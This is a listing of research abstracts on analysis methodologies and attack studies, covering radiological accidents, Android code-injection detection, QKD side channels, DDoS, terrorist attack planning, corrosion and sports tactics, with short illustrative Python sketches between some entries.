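        print(f"P(error) = {p_error:.3f}")
        print(f"P(training deficient | error) = {p_deficient_given_error:.3f}")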

  10. A methodology for radiological accidents analysis in industrial gamma radiography

    International Nuclear Information System (INIS)

    Silva, F.C.A. da.

    1990-01-01

    A critical review of 34 published severe radiological accidents in industrial gamma radiography that happened in 15 countries from 1960 to 1988 was performed. The most frequent causes, consequences and dose estimation methods were analysed, aiming to establish better procedures for radiation safety and accident analysis. The objective of this work is to elaborate a methodology for the analysis of radiological accidents in industrial gamma radiography. The suggested methodology will enable professionals to determine the true causes of an event and to estimate the dose with good certainty. The technical analytical tree, recommended by the International Atomic Energy Agency for radiation protection and nuclear safety programs, was adopted in the elaboration of the suggested methodology. The viability of using the Electron Gamma Shower 4 Computer Code System to calculate the absorbed dose in radiological accidents in industrial gamma radiography, mainly in 192Ir radioactive source handling situations, was also studied. (author)

  11. Disposal criticality analysis methodology's principal isotope burnup credit

    International Nuclear Information System (INIS)

    Doering, T.W.; Thomas, D.A.

    2001-01-01

    This paper presents the burnup credit aspects of the United States Department of Energy Yucca Mountain Project's methodology for performing criticality analyses for commercial light-water-reactor fuel. The disposal burnup credit methodology uses a 'principal isotope' model, which takes credit for the reduced reactivity associated with the build-up of the primary principal actinides and fission products in irradiated fuel. Burnup credit is important to the disposal criticality analysis methodology and to the design of commercial fuel waste packages. The burnup credit methodology developed for disposal of irradiated commercial nuclear fuel can also be applied to storage and transportation of irradiated commercial nuclear fuel. For all applications a series of loading curves are developed using a best estimate methodology and depending on the application, an additional administrative safety margin may be applied. The burnup credit methodology better represents the 'true' reactivity of the irradiated fuel configuration, and hence the real safety margin, than do evaluations using the 'fresh fuel' assumption. (author)
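
    In application, a burnup-credit loading curve reduces to an acceptance check: an assembly is loadable only if its achieved burnup meets the minimum required for its initial enrichment. A sketch with entirely hypothetical curve points and margin:

        import numpy as np

        # Hypothetical loading curve: initial enrichment (wt% U-235) vs. minimum burnup (GWd/MTU)
        enrichment_pts = np.array([2.0, 3.0, 4.0, 5.0])
        min_burnup_pts = np.array([0.0, 10.0, 22.0, 35.0])

        def assembly_acceptable(enrichment, burnup, margin=0.0):
            """True if burnup, less an administrative margin, lies on or above the curve."""
            required = np.interp(enrichment, enrichment_pts, min_burnup_pts)
            return (burnup - margin) >= required

        print(assembly_acceptable(4.2, 30.0))               # above the curve -> True
        print(assembly_acceptable(4.2, 20.0, margin=2.0))   # below the curve -> False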

  12. Large-Scale Analysis of Remote Code Injection Attacks in Android Apps

    Directory of Open Access Journals (Sweden)

    Hyunwoo Choi

    2018-01-01

    Full Text Available It is pretty well known that insecure code updating procedures for Android allow remote code injection attack. However, other than codes, there are many resources in Android that have to be updated, such as temporary files, images, databases, and configurations (XML and JSON. Security of update procedures for these resources is largely unknown. This paper investigates general conditions for remote code injection attacks on these resources. Using this, we design and implement a static detection tool that automatically identifies apps that meet these conditions. We apply the detection tool to a large dataset comprising 9,054 apps, from three different types of datasets: official market, third-party market, and preinstalled apps. As a result, 97 apps were found to be potentially vulnerable, with 53 confirmed as vulnerable to remote code injection attacks.
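
    The authors' tool analyses app code statically; as a rough, purely illustrative stand-in for that idea, the sketch below scans decompiled app resources and configuration text for two tell-tale conditions, cleartext update URLs and external-storage access. The patterns, file set and directory name are assumptions, not the paper's ruleset:

        import re
        from pathlib import Path

        CLEARTEXT_URL = re.compile(r"http://[^\s\"']+")
        EXTERNAL_STORAGE = re.compile(r"/sdcard/|getExternalStorageDirectory")

        def scan_app_resources(root):
            """Yield (file, finding) pairs for potentially insecure update conditions."""
            for path in Path(root).rglob("*"):
                if not path.is_file() or path.suffix.lower() not in {".xml", ".json", ".smali", ".txt"}:
                    continue
                text = path.read_text(errors="ignore")
                for pattern, label in [(CLEARTEXT_URL, "cleartext update URL"),
                                       (EXTERNAL_STORAGE, "external storage access")]:
                    if pattern.search(text):
                        yield str(path), label

        if __name__ == "__main__":
            for file, finding in scan_app_resources("decompiled_app"):
                print(f"{finding}: {file}")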

  13. Failure Analysis of End Grain Attack and Pit Corrosion in 316L Stainless Steel Pipe

    Energy Technology Data Exchange (ETDEWEB)

    Baek, Un Bong; Nam, Sung Hoon [Korea Research Institute of Standards and Science, Daejeon (Korea, Republic of); Choe, Byung Hak; Shim, Jong Hun [Gangneung-Wonju National University, Gangneung (Korea, Republic of); Lee, Jin Hee [Oil and Gas Technology SK E and C, Junggu (Korea, Republic of); Kim, Eui Soo [National Forensic Service, Wonju (Korea, Republic of)

    2015-01-15

    The aim of this paper was to analyze the cause of surface cracks and pit corrosion on 316L pipe. End Grain Attack (EGA), a kind of pitting mechanism, occurred on the pipe surface. The early stage of the EGA may originate from under-deposits of caustic-water formation species such as Na+, K+, Ca+ and Mg+. The under-deposit corrosion is caused by the corrosion layer on the pipe surface, followed by crevice corrosion due to accumulation of Cl‒ or S‒ species between the corrosion layer and the pipe surface. In the early stage, the EGA occurred at all grain boundaries beneath the under-deposit corrosion. In the later stage of EGA, almost all the early attacked grain boundaries stopped at a limited depth of about 10 µm. Meanwhile, only a small number of the attacked boundaries progressed into the pipe as pit corrosion and resulted in leak failure.

  14. Extended analysis of the Trojan-horse attack in quantum key distribution

    Science.gov (United States)

    Vinay, Scott E.; Kok, Pieter

    2018-04-01

    The discrete-variable quantum key distribution protocols based on the 1984 protocol of Bennett and Brassard (BB84) are known to be secure against an eavesdropper, Eve, intercepting the flying qubits and performing any quantum operation on them. However, these protocols may still be vulnerable to side-channel attacks. We investigate the Trojan-horse side-channel attack where Eve sends her own state into Alice's apparatus and measures the reflected state to estimate the key. We prove that the separable coherent state is optimal for Eve among the class of multimode Gaussian attack states, even in the presence of thermal noise. We then provide a bound on the secret key rate in the case where Eve may use any separable state.

  15. Cyber-Attacks on Smart Meters in Household Nanogrid: Modeling, Simulation and Analysis

    OpenAIRE

    Tellbach, Denise; Li, Yan-Fu

    2018-01-01

    The subject of cyber-security, and therefore of cyber-attacks on the smart grid (SG), has become the subject of many publications in recent years, emphasizing its importance in research as well as in practice. One especially vulnerable part of the SG is the smart meter (SM). The major contribution of this work is the simulation of a variety of cyber-attacks on SMs that have not been covered in previous studies, together with the identification and quantification of their possible impacts on the security of the SG. In this study, a simulation model...

  16. Modeling attacking of high skills volleyball players

    Directory of Open Access Journals (Sweden)

    Vladimir Gamaliy

    2014-12-01

    Full Text Available Purpose: to determine the model indicators of technical and tactical actions in the attack of highly skilled volleyball players. Material and Methods: the study used statistical data from major international competitions: the Olympic Games 2012, World Championship 2010, World League 2010–2014 and European Championship 2010–2014. A total of 130 games were analyzed. The methods used were: analysis and generalization of scientific and methodological literature, analysis of the competitive activity of highly skilled volleyball players, pedagogical observation, and modeling of technical and tactical actions in the attack of highly skilled volleyball players. Results: it was found that the largest volume of technical and tactical actions in the attack belongs to the group tactic «supple movement», with an indicator of 21.3%. The smallest volume belongs to the group tactic «flight level», with a model indicator of 5.4% and an efficiency of 3.4%, respectively. The jump power serve is used in 51.6% of cases according to the model parameters, the planned (float) serve in 21.7% and the short planned serve in 4.4%. Attacks from the back line are used in 20.8% of cases according to the model parameters, with an efficiency of 13.7%. Conclusions: it is shown that the indicators of technical and tactical actions in the attack can be used as model values in the system of control of the training and competitive process of highly skilled volleyball players

  17. Evaluation of a Multi-Agent System for Simulation and Analysis of Distributed Denial-of-Service Attacks

    National Research Council Canada - National Science Library

    Huu, Tee

    2003-01-01

    The DDoS attack is evolving at a rapid and alarming rate; an effective solution must be formulated using an adaptive approach. Most of the simulations are performed at the attack phase of the DDoS attack...

  18. Moments of Goodness: An Analysis of Ethical and Educational Dimensions of the Terror Attack on Utøya, Norway (July 22, 2011)

    Science.gov (United States)

    Kristiansen, Aslaug

    2015-01-01

    The analysis is based on some moral experiences taking place during a terrorist attack on the Norwegian Labor Party's youth camp on the island of Utøya (outside of Oslo) on July 22, 2011, where 69 young people were killed and several seriously injured. After the attack, many of the survivors told stories of how strangers had spontaneously helped and…

  19. A Local Approach Methodology for the Analysis of Ultimate Strength ...

    African Journals Online (AJOL)

    The local approach methodology in contrast to classical fracture mechanics can be used to predict the onset of tearing fracture, and the effects of geometry in tubular joints. Finite element analysis of T-joints plate geometries, and tubular joints has been done. The parameters of constraint, equivalent stress, plastic strain and ...

  20. Methodology for reactor core physics analysis - part 2

    International Nuclear Information System (INIS)

    Ponzoni Filho, P.; Fernandes, V.B.; Lima Bezerra, J. de; Santos, T.I.C.

    1992-12-01

    The computer codes used for reactor core physics analysis are described. The modifications introduced in the public codes and the technical basis for the codes developed by the FURNAS utility are justified. An evaluation of the impact of these modifications on the parameter involved in qualifying the methodology is included. (F.E.). 5 ref, 7 figs, 5 tabs

  1. Human Schedule Performance, Protocol Analysis, and the "Silent Dog" Methodology

    Science.gov (United States)

    Cabello, Francisco; Luciano, Carmen; Gomez, Inmaculada; Barnes-Holmes, Dermot

    2004-01-01

    The purpose of the current experiment was to investigate the role of private verbal behavior on the operant performances of human adults, using a protocol analysis procedure with additional methodological controls (the "silent dog" method). Twelve subjects were exposed to fixed ratio 8 and differential reinforcement of low rate 3-s schedules. For…

  2. Lone Actor Terrorist Attack Planning and Preparation: A Data-Driven Analysis.

    Science.gov (United States)

    Schuurman, Bart; Bakker, Edwin; Gill, Paul; Bouhana, Noémie

    2017-10-23

    This article provides an in-depth assessment of lone actor terrorists' attack planning and preparation. A codebook of 198 variables related to different aspects of pre-attack behavior is applied to a sample of 55 lone actor terrorists. Data were drawn from open-source materials and complemented where possible with primary sources. Most lone actors are not highly lethal or surreptitious attackers. They are generally poor at maintaining operational security, leak their motivations and capabilities in numerous ways, and generally do so months and even years before an attack. Moreover, the "loneness" thought to define this type of terrorism is generally absent; most lone actors uphold social ties that are crucial to their adoption and maintenance of the motivation and capability to commit terrorist violence. The results offer concrete input for those working to detect and prevent this form of terrorism and argue for a re-evaluation of the "lone actor" concept. © 2017 The Authors. Journal of Forensic Sciences published by Wiley Periodicals, Inc. on behalf of American Academy of Forensic Sciences.

  3. Interactive analysis of SDN-driven defence against Distributed Denial of Service attacks

    NARCIS (Netherlands)

    Koning, R.; de Graaff, B.; de Laat, C.; Meijer, R.; Grosso, P.

    2016-01-01

    The Secure Autonomous Response Networks (SARNET) framework introduces a mechanism to respond autonomously to security attacks in Software Defined Networks (SDN). Still the range of responses possible and their effectiveness need to be properly evaluated such that the decision making process and the

  4. Quantifying Improbability: An Analysis of the Lloyd’s of London Business Blackout Cyber Attack Scenario

    Science.gov (United States)

    Scenarios that describe cyber attacks on the electric grid consistently predict significant disruptions to the economy and citizens' quality of life...phenomena that deserve further investigation, such as the importance of some individual power plants in influencing the adversary's probability of

  5. PROBLEMS AND METHODOLOGY OF THE PETROLOGIC ANALYSIS OF COAL FACIES.

    Science.gov (United States)

    Chao, Edward C.T.

    1983-01-01

    This condensed synthesis gives a broad outline of the methodology of coal facies analysis, procedures for constructing sedimentation and geochemical formation curves, and micro- and macrostratigraphic analysis. The hypothetical coal bed profile has a 3-fold cycle of material characteristics. Based on studies of other similar profiles of the same coal bed, and on field studies of the sedimentary rock types and their facies interpretation, one can assume that the 3-fold subdivision is of regional significance.

  6. Disposal criticality analysis methodology for fissile waste forms

    International Nuclear Information System (INIS)

    Davis, J.W.; Gottlieb, P.

    1998-03-01

    A general methodology has been developed to evaluate the criticality potential of the wide range of waste forms planned for geologic disposal. The range of waste forms includes commercial spent fuel, high level waste, DOE spent fuel (including highly enriched), MOX using weapons grade plutonium, and immobilized plutonium. The disposal of these waste forms will be in a container with sufficiently thick corrosion resistant barriers to prevent water penetration for up to 10,000 years. The criticality control for DOE spent fuel is primarily provided by neutron absorber material incorporated into the basket holding the individual assemblies. For the immobilized plutonium, the neutron absorber material is incorporated into the waste form itself. The disposal criticality analysis methodology includes the analysis of geochemical and physical processes that can breach the waste package and affect the waste forms within. The basic purpose of the methodology is to guide the criticality control features of the waste package design, and to demonstrate that the final design meets the criticality control licensing requirements. The methodology can also be extended to the analysis of criticality consequences (primarily increased radionuclide inventory), which will support the total performance assessment for the repository

  7. Two methodologies for optical analysis of contaminated engine lubricants

    International Nuclear Information System (INIS)

    Aghayan, Hamid; Yang, Jun; Bordatchev, Evgueni

    2012-01-01

    The performance, efficiency and lifetime of modern combustion engines significantly depend on the quality of the engine lubricants. However, contaminants, such as gasoline, moisture, coolant and wear particles, reduce the life of engine mechanical components and lubricant quality. Therefore, direct and indirect measurements of engine lubricant properties, such as physical-mechanical, electro-magnetic, chemical and optical properties, are intensively utilized in engine condition monitoring systems and sensors developed within the last decade. Such sensors for the measurement of engine lubricant properties can be used to detect a functional limit of the in-use lubricant, increase drain interval and reduce the environmental impact. This paper proposes two new methodologies for the quantitative and qualitative analysis of the presence of contaminants in the engine lubricants. The methodologies are based on optical analysis of the distortion effect when an object image is obtained through a thin random optical medium (e.g. engine lubricant). The novelty of the proposed methodologies is in the introduction of an object with a known periodic shape behind a thin film of the contaminated lubricant. In this case, an acquired image represents a combined lubricant–object optical appearance, where an a priori known periodic structure of the object is distorted by a contaminated lubricant. In the object shape-based optical analysis, several parameters of an acquired optical image, such as the gray scale intensity of lubricant and object, shape width at object and lubricant levels, object relative intensity and width non-uniformity coefficient are newly proposed. Variations in the contaminant concentration and use of different contaminants lead to the changes of these parameters measured on-line. In the statistical optical analysis methodology, statistical auto- and cross-characteristics (e.g. auto- and cross-correlation functions, auto- and cross-spectrums, transfer function

  8. Methodology for dimensional variation analysis of ITER integrated systems

    International Nuclear Information System (INIS)

    Fuentes, F. Javier; Trouvé, Vincent; Cordier, Jean-Jacques; Reich, Jens

    2016-01-01

    Highlights: • Tokamak dimensional management methodology, based on 3D variation analysis, is presented. • Dimensional Variation Model implementation workflow is described. • Methodology phases are described in detail. The application of this methodology to the tolerance analysis of ITER Vacuum Vessel is presented. • Dimensional studies are a valuable tool for the assessment of Tokamak PCR (Project Change Requests), DR (Deviation Requests) and NCR (Non-Conformance Reports). - Abstract: The ITER machine consists of a large number of complex systems highly integrated, with critical functional requirements and reduced design clearances to minimize the impact in cost and performances. Tolerances and assembly accuracies in critical areas could have a serious impact in the final performances, compromising the machine assembly and plasma operation. The management of tolerances allocated to part manufacture and assembly processes, as well as the control of potential deviations and early mitigation of non-compliances with the technical requirements, is a critical activity on the project life cycle. A 3D tolerance simulation analysis of ITER Tokamak machine has been developed based on 3DCS dedicated software. This integrated dimensional variation model is representative of Tokamak manufacturing functional tolerances and assembly processes, predicting accurate values for the amount of variation on critical areas. This paper describes the detailed methodology to implement and update the Tokamak Dimensional Variation Model. The model is managed at system level. The methodology phases are illustrated by its application to the Vacuum Vessel (VV), considering the status of maturity of VV dimensional variation model. The following topics are described in this paper: • Model description and constraints. • Model implementation workflow. • Management of input and output data. • Statistical analysis and risk assessment. The management of the integration studies based on

  9. Methodology for dimensional variation analysis of ITER integrated systems

    Energy Technology Data Exchange (ETDEWEB)

    Fuentes, F. Javier, E-mail: FranciscoJavier.Fuentes@iter.org [ITER Organization, Route de Vinon-sur-Verdon—CS 90046, 13067 St Paul-lez-Durance (France); Trouvé, Vincent [Assystem Engineering & Operation Services, rue J-M Jacquard CS 60117, 84120 Pertuis (France); Cordier, Jean-Jacques; Reich, Jens [ITER Organization, Route de Vinon-sur-Verdon—CS 90046, 13067 St Paul-lez-Durance (France)

    2016-11-01

    Highlights: • Tokamak dimensional management methodology, based on 3D variation analysis, is presented. • Dimensional Variation Model implementation workflow is described. • Methodology phases are described in detail. The application of this methodology to the tolerance analysis of the ITER Vacuum Vessel is presented. • Dimensional studies are a valuable tool for the assessment of Tokamak PCR (Project Change Requests), DR (Deviation Requests) and NCR (Non-Conformance Reports). - Abstract: The ITER machine consists of a large number of highly integrated complex systems, with critical functional requirements and reduced design clearances to minimize the impact on cost and performance. Tolerances and assembly accuracies in critical areas could have a serious impact on the final performance, compromising the machine assembly and plasma operation. The management of tolerances allocated to part manufacture and assembly processes, as well as the control of potential deviations and early mitigation of non-compliances with the technical requirements, is a critical activity in the project life cycle. A 3D tolerance simulation analysis of the ITER Tokamak machine has been developed based on the dedicated 3DCS software. This integrated dimensional variation model is representative of Tokamak manufacturing functional tolerances and assembly processes, predicting accurate values for the amount of variation in critical areas. This paper describes the detailed methodology to implement and update the Tokamak Dimensional Variation Model. The model is managed at system level. The methodology phases are illustrated by its application to the Vacuum Vessel (VV), considering the status of maturity of the VV dimensional variation model. The following topics are described in this paper: • Model description and constraints. • Model implementation workflow. • Management of input and output data. • Statistical analysis and risk assessment. The management of the integration studies based on
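
    The 3DCS dimensional variation model referenced above is, at its core, a Monte Carlo propagation of manufacturing and assembly tolerances to critical interfaces. The following sketch shows the same idea on a deliberately simple 1-D tolerance stack with made-up nominal dimensions and tolerances; it is not the ITER model and ignores 3D kinematics and assembly sequencing.

```python
import numpy as np

rng = np.random.default_rng(42)
n_samples = 100_000

# Illustrative 1-D stack: nominal contributions (mm) and their tolerances (mm).
nominals   = np.array([120.0, -45.0, 310.0, -60.0])
tolerances = np.array([0.8, 0.5, 1.2, 0.6])          # interpreted here as +/- 3 sigma

# Sample each contributor as a normal distribution and sum the chain.
samples = rng.normal(loc=nominals, scale=tolerances / 3.0, size=(n_samples, nominals.size))
gap = samples.sum(axis=1)

print(f"mean gap      : {gap.mean():.3f} mm")
print(f"std deviation : {gap.std():.3f} mm")
print(f"95% interval  : [{np.percentile(gap, 2.5):.3f}, {np.percentile(gap, 97.5):.3f}] mm")
```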

  10. Terrorism in the Basque press (1990, 2000, 2008 and 2009). Analysis of newspaper editorials about ETA’s fatal attacks

    Directory of Open Access Journals (Sweden)

    José-María Caminos-Marcet, Ph.D.

    2013-01-01

    Full Text Available This article presents an analysis of the editorials published by the Basque press in 1990, 2000, 2008 and 2009, when ETA carried out fatal attacks. The objective is to examine the treatment given by the different Basque newspapers to terrorism in their most important opinion texts, which reflect their ideology. The initial hypothesis is that the editorial line used by the Basque press to address ETA’s attacks has changed remarkably during the analysed years, going from the virtual absence of editorials to the use of editorials as active instruments in the fight against violence. By 2009, the Basque press had finally defined its strategy to combat ETA’s terrorism, and this was perfectly reflected in their editorials.

  11. A multiple linear regression analysis of hot corrosion attack on a series of nickel base turbine alloys

    Science.gov (United States)

    Barrett, C. A.

    1985-01-01

    Multiple linear regression analysis was used to determine an equation for estimating hot corrosion attack for a series of Ni-base cast turbine alloys. The U transform (i.e., arcsin[(%A/100)^(1/2)]) was shown to give the best estimate of the dependent variable, y. A complete second-degree equation is described for the "centered" weight chemistries for the elements Cr, Al, Ti, Mo, W, Cb, Ta, and Co. In addition, linear terms for the minor elements C, B, and Zr were added, for a basic 47-term equation. The best reduced equation was determined by the stepwise selection method, with essentially 13 terms. The Cr term was found to be the most important, accounting for 60 percent of the explained variability in hot corrosion attack.
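
    As an illustration of the regression procedure described above, the sketch below fits a second-degree model to a transformed attack variable and reduces it by forward stepwise selection. The data are synthetic, only two "chemistry" variables are used instead of the full 47-term model, and the U transform is assumed here to be the arcsine-square-root form suggested by the abstract.

```python
import numpy as np

rng = np.random.default_rng(1)

# Synthetic stand-in: percent attack A as a function of two "chemistry" variables.
n = 200
cr, al = rng.uniform(5, 20, n), rng.uniform(1, 6, n)
attack_pct = np.clip(60 - 2.5 * cr + 1.2 * al + rng.normal(0, 3, n), 0.5, 99.5)

# U transform of the dependent variable (arcsine square-root form assumed here).
u = np.arcsin(np.sqrt(attack_pct / 100.0))

# Candidate regressors: centered linear and second-degree terms.
crc, alc = cr - cr.mean(), al - al.mean()
candidates = {"Cr": crc, "Al": alc, "Cr^2": crc**2, "Al^2": alc**2, "Cr*Al": crc * alc}

def rss(columns):
    """Residual sum of squares of an ordinary least-squares fit with the given columns."""
    X = np.column_stack([np.ones(n)] + columns)
    beta, *_ = np.linalg.lstsq(X, u, rcond=None)
    return np.sum((u - X @ beta) ** 2)

# Forward stepwise selection: repeatedly add the term giving the largest RSS reduction.
selected, remaining = [], dict(candidates)
current_rss = rss([])
while remaining:
    best_name = min(remaining,
                    key=lambda k: rss([candidates[s] for s in selected] + [remaining[k]]))
    best_rss = rss([candidates[s] for s in selected] + [remaining[best_name]])
    if current_rss - best_rss < 1e-3 * current_rss:   # stop when the improvement is negligible
        break
    selected.append(best_name)
    current_rss = best_rss
    del remaining[best_name]

print("selected terms:", selected)
```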

  12. Propagating Mixed Uncertainties in Cyber Attacker Payoffs: Exploration of Two-Phase Monte Carlo Sampling and Probability Bounds Analysis

    Energy Technology Data Exchange (ETDEWEB)

    Chatterjee, Samrat; Tipireddy, Ramakrishna; Oster, Matthew R.; Halappanavar, Mahantesh

    2016-09-16

    Securing cyber-systems on a continual basis against a multitude of adverse events is a challenging undertaking. Game-theoretic approaches, that model actions of strategic decision-makers, are increasingly being applied to address cybersecurity resource allocation challenges. Such game-based models account for multiple player actions and represent cyber attacker payoffs mostly as point utility estimates. Since a cyber-attacker’s payoff generation mechanism is largely unknown, appropriate representation and propagation of uncertainty is a critical task. In this paper we expand on prior work and focus on operationalizing the probabilistic uncertainty quantification framework, for a notional cyber system, through: 1) representation of uncertain attacker and system-related modeling variables as probability distributions and mathematical intervals, and 2) exploration of uncertainty propagation techniques including two-phase Monte Carlo sampling and probability bounds analysis.
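
    A minimal sketch of the two-phase (double-loop) Monte Carlo idea mentioned above: the outer loop samples an epistemic quantity known only as an interval (here, the attacker's mean payoff), the inner loop samples aleatory variability around it, and the spread of the inner-loop results expresses the epistemic uncertainty. All numbers are illustrative and unrelated to the paper's notional cyber system.

```python
import numpy as np

rng = np.random.default_rng(7)

# Epistemic uncertainty: the attacker's mean payoff is only known as an interval.
mean_payoff_interval = (2.0, 5.0)
# Aleatory variability: scenario-to-scenario spread around that mean.
payoff_sigma = 1.5
threshold = 4.0          # payoff level of interest, e.g. "attack is worthwhile"

n_outer, n_inner = 500, 2000
exceedance = np.empty(n_outer)

for i in range(n_outer):                                       # outer loop: epistemic draw
    mean_payoff = rng.uniform(*mean_payoff_interval)
    payoffs = rng.normal(mean_payoff, payoff_sigma, n_inner)   # inner loop: aleatory draws
    exceedance[i] = np.mean(payoffs > threshold)

# The spread of the inner-loop probabilities reflects the epistemic uncertainty only.
print(f"P(payoff > {threshold}) ranges from {exceedance.min():.3f} to {exceedance.max():.3f}")
print(f"epistemic 5th-95th percentile band: "
      f"[{np.percentile(exceedance, 5):.3f}, {np.percentile(exceedance, 95):.3f}]")
```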

  13. A Multivariant Stream Analysis Approach to Detect and Mitigate DDoS Attacks in Vehicular Ad Hoc Networks

    Directory of Open Access Journals (Sweden)

    Raenu Kolandaisamy

    2018-01-01

    Full Text Available Vehicular Ad Hoc Networks (VANETs) are rapidly gaining attention due to the diversity of services that they can potentially offer. However, VANET communication is vulnerable to numerous security threats such as Distributed Denial of Service (DDoS) attacks. Dealing with these attacks in VANETs is a challenging problem. Most of the existing DDoS detection techniques suffer from poor accuracy and high computational overhead. To cope with these problems, we present a novel Multivariant Stream Analysis (MVSA) approach. The proposed MVSA approach maintains multiple stages for detecting DDoS attacks in the network. The Multivariant Stream Analysis gives a unique result based on Vehicle-to-Vehicle communication through the Road Side Unit. The approach observes the traffic in different situations and time frames and maintains different rules for various traffic classes in various time windows. The performance of the MVSA is evaluated using an NS2 simulator. Simulation results demonstrate the effectiveness and efficiency of the MVSA regarding detection accuracy and reducing the impact on VANET communication.

  14. Development of Audit Calculation Methodology for RIA Safety Analysis

    Energy Technology Data Exchange (ETDEWEB)

    Lee, Joosuk; Kim, Gwanyoung; Woo, Swengwoong [Korea Institute of Nuclear Safety, Daejeon (Korea, Republic of)

    2015-05-15

    The interim criteria contain more stringent limits than the previous ones. For example, pellet-to-cladding mechanical interaction (PCMI) was introduced as a new failure criterion. And both short-term (e.g. fuel-to-coolant interaction, rod burst) and long-term (e.g. fuel rod ballooning, flow blockage) phenomena should be addressed for core coolability assurance. For dose calculations, transient-induced fission gas release has to be accounted for additionally. Traditionally, the approved RIA analysis methodologies for licensing application are developed based on a conservative approach. But the newly introduced safety criteria tend to reduce the margins to the criteria. Therefore, licensees are trying to improve the margins by utilizing a less conservative approach. In this situation, to cope with this trend, a new audit calculation methodology needs to be developed. In this paper, the new methodology, which is currently under development at KINS, is introduced. For the development of an audit calculation methodology for RIA safety analysis based on the realistic evaluation approach, a preliminary calculation utilizing a best-estimate code has been performed on the initial core of APR1400. The main conclusions are as follows. - With the assumption of a single full-strength control rod ejection in the HZP condition, rod failure due to PCMI is not predicted. - And coolability can be assured in view of enthalpy and fuel melting. - But rod failure due to DNBR is expected, and there is a possibility of fuel failure at rated power conditions as well.

  15. A continuum damage analysis of hydrogen attack in 2.25 Cr-1Mo vessel

    DEFF Research Database (Denmark)

    van der Burg, M.W.D.; van der Giessen, E.; Tvergaard, Viggo

    1998-01-01

    A micromechanically based continuum damage model is presented to analyze the stress, temperature and hydrogen pressure dependent material degradation process termed hydrogen attack, inside a pressure vessel. Hydrogen attack (HA) is the damage process of grain boundary facets due to a chemical reaction of carbides with hydrogen, thus forming cavities with high pressure methane gas. Driven by the methane gas pressure, the cavities grow, while remote tensile stresses can significantly enhance the cavitation rate. The damage model gives the strain-rate and damage rate as a function of the temperature, hydrogen pressure and applied stresses. The model is applied to study HA in a vessel wall, where nonuniform distributions of hydrogen pressure, temperature and stresses result in a nonuniform damage distribution over the vessel wall. Stresses inside the vessel wall first tend to accelerate...

  16. Analysis Of Default Passwords In Routers Against Brute-Force Attack

    OpenAIRE

    Mohammed Farik; ABM Shawkat Ali

    2015-01-01

    Abstract Password authentication is the main means of access control on network routers, and router manufacturers provide a default password for initial login to the router. While there have been many publications regarding the minimum requirements of a good password, how widely the manufacturers themselves adhere to these minimum standards, and whether these passwords can withstand brute-force attack, is not widely known. The novelty of this research is that this is the first time default...

  17. Latest developments on safety analysis methodologies at the Juzbado plant

    International Nuclear Information System (INIS)

    Zurron-Cifuentes, Oscar; Ortiz-Trujillo, Diego; Blanco-Fernandez, Luis A.

    2010-01-01

    Over the last few years the Juzbado Plant has developed and implemented several analysis methodologies to cope with specific issues regarding safety management. This paper describes the three most outstanding of them, namely the Integrated Safety Analysis (ISA) project, the adaptation of the MARSSIM methodology for characterization surveys of radioactive contamination spots, and the programme for the Systematic Review of the Operational Conditions of the Safety Systems (SROCSS). Several reasons motivated the decision to implement such methodologies, such as Regulator requirements, operational experience and, of course, the strong commitment of ENUSA to maintain the highest standards of the nuclear industry in all safety-relevant activities. In this context, since 2004 ENUSA has been undertaking the ISA project, which consists of a systematic examination of the plant's processes, equipment, structures and personnel activities to ensure that all relevant hazards that could result in unacceptable consequences have been adequately evaluated and the appropriate protective measures have been identified. On the other hand, and within the framework of a current programme to ensure the absence of radioactive contamination spots in unintended areas, the MARSSIM methodology is being applied as a tool to conduct the radiation surveys and investigation of potentially contaminated areas. Finally, the SROCSS programme was initiated earlier this year, 2009, to assess the actual operating conditions of all the systems with safety relevance, aiming to identify either potential non-conformities or areas for improvement in order to ensure their high performance after years of operation. The following paragraphs describe the key points related to these three methodologies as well as an outline of the results obtained so far. (authors)

  18. In Their Own Words? Methodological Considerations in the Analysis of Terrorist Autobiographies

    Directory of Open Access Journals (Sweden)

    Mary Beth Altier

    2012-01-01

    Full Text Available Despite the growth of terrorism literature in the aftermath of the 9/11 attacks, there remain several methodological challenges to studying certain aspects of terrorism. This is perhaps most evident in attempts to uncover the attitudes, motivations, and intentions of individuals engaged in violent extremism and how they are sometimes expressed in problematic behavior. Such challenges invariably stem from the fact that terrorists and the organizations to which they belong represent clandestine populations engaged in illegal activity. Unsurprisingly, these qualities make it difficult for the researcher to identify and locate willing subjects of study—let alone a representative sample. In this research note, we suggest the systematic analysis of terrorist autobiographies offers a promising means of investigating difficult-to-study areas of terrorism-related phenomena. Investigation of autobiographical accounts not only offers additional data points for the study of individual psychological issues, but also provides valuable perspectives on the internal structures, processes, and dynamics of terrorist organizations more broadly. Moreover, given most autobiographies cover critical events and personal experiences across the life course, they provide a unique lens into how terrorists perceive their world and insight into their decision-making processes. We support our advocacy of this approach by highlighting its methodological strengths and shortcomings.

  19. Application of human reliability analysis methodology of second generation

    International Nuclear Information System (INIS)

    Ruiz S, T. de J.; Nelson E, P. F.

    2009-10-01

    Human reliability analysis (HRA) is a very important part of probabilistic safety analysis. The main contribution of HRA in nuclear power plants is the identification and characterization of the issues that combine to produce an error in human tasks performed under normal operating conditions and in those performed after an abnormal event. Additionally, the analysis of various accidents in history has found that the human component has been a contributing factor in their cause. The need to understand the forms and probability of human error led, in the 1960s, to the collection of generic data that resulted in the development of the first generation of HRA methodologies. Methods were subsequently developed to include additional performance shaping factors, and the interactions between them, in their models. By the mid-1990s, what are considered the second-generation methodologies had emerged. Among these is A Technique for Human Event Analysis (ATHEANA). The application of this method to a generic human failure event is interesting because its modeling includes errors of commission, the quantification of deviations from the nominal scenario considered in the accident sequence of the probabilistic safety analysis and, for this event, the evaluation of dependencies between actions. That is, the generic human failure event first required independent evaluation of the two related human failure events. The derivation of the new human error probabilities therefore involves quantification of the nominal scenario and of the significant deviation cases, considered for their potential impact on the analyzed human failure events. As in probabilistic safety analysis, the analysis of the sequences identified the more specific factors with the highest contribution to the human error probabilities. (Author)

  20. Methodology, Measurement and Analysis of Flow Table Update Characteristics in Hardware OpenFlow Switches

    KAUST Repository

    Kuźniar, Maciej; Pereší ni, Peter; Kostić, Dejan; Canini, Marco

    2018-01-01

    and performance characteristics is essential for ensuring successful and safe deployments. We propose a systematic methodology for SDN switch performance analysis and devise a series of experiments based on this methodology. The methodology relies on sending a

  1. Comparative Analysis of Return of Serve as Counter-attack in Modern Tennis

    Directory of Open Access Journals (Sweden)

    Petru Eugen MERGHEŞ

    2017-02-01

